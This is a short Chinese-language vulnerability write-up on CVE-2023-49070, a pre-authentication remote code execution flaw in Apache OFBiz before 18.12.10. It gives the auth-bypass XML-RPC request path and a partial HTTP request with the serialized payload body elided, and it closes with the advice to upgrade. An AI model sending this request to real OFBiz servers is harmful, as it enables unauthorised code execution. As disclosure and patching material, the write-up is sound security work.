0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

Apache Ofbiz 18.12.10之前版本存在代码注入漏洞,该漏洞源于存在预授权远程执行代码(RCE)漏洞。

0x02影响版本

Apache OFBiz<18.12.10

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y

漏洞复现

GET /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 14
Accept-Encoding: gzip

<?xml .....
</serializable

执行calc(网图)

执行poc漏洞存在如下截图

3.xpoc工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

Apache OFBiz >= 18.12.10

https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
https://twitter.com/hashtag/POC?src=hash&ref_src=twsrc%5Etfw
https://securityonline.info/cve-2023-49070-rce-vulnerability-apache-ofbiz/